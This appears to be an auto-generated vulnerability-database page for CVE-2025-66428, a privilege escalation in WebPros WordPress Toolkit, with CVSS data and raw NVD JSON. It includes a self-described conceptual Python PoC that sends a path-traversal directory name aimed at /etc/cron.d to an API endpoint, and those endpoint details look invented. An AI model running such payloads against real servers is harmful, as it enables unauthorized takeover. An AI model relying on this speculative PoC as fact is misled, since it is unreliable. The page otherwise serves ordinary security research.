Security Vulnerability Report
中文
CVE-2025-66428 CVSS 8.8 HIGH

CVE-2025-66428

Published: 2026-01-22 19:15:54
Last Modified: 2026-04-15 00:35:42

Description

An issue with WordPress directory names in WebPros WordPress Toolkit before 6.9.1 allows privilege escalation.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WebPros WordPress Toolkit < 6.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66428 PoC - WordPress Toolkit Privilege Escalation # Note: This is a conceptual PoC for educational purposes only import requests import json TARGET = "https://target-server:8443" CVE_ID = "CVE-2025-66428" def check_version(target): """Check if target is vulnerable""" endpoint = f"{target}/wordpress-toolkit/api/version" try: response = requests.get(endpoint, verify=False, timeout=10) version = response.json().get('version', '') # Vulnerable if version < 6.9.1 return version except: return None def exploit_privilege_escalation(target, session_cookie): """Exploit the directory name privilege escalation""" # Step 1: Create malicious directory name with path traversal payload = { "action": "clone", "source_domain": "victim.com", "target_domain": "attacker.com", "directory_name": "../../../../etc/cron.d/malicious" } headers = { "Cookie": session_cookie, "Content-Type": "application/json" } endpoint = f"{target}/wordpress-toolkit/api/v1/instances" response = requests.post(endpoint, json=payload, headers=headers, verify=False) return response.status_code == 200 if __name__ == "__main__": print(f"Testing {CVE_ID}") version = check_version(TARGET) if version: print(f"Detected version: {version}") print("Vulnerability check: Upgrade to 6.9.1 or later")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66428", "sourceIdentifier": "[email protected]", "published": "2026-01-22T19:15:53.680", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue with WordPress directory names in WebPros WordPress Toolkit before 6.9.1 allows privilege escalation."}, {"lang": "es", "value": "Un problema con los nombres de directorio de WordPress en WebPros WordPress Toolkit antes de 6.9.1 permite la escalada de privilegios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://docs.plesk.com/release-notes/obsidian/change-log/#wordpress-toolkit-6.9.1", "source": "[email protected]"}]}}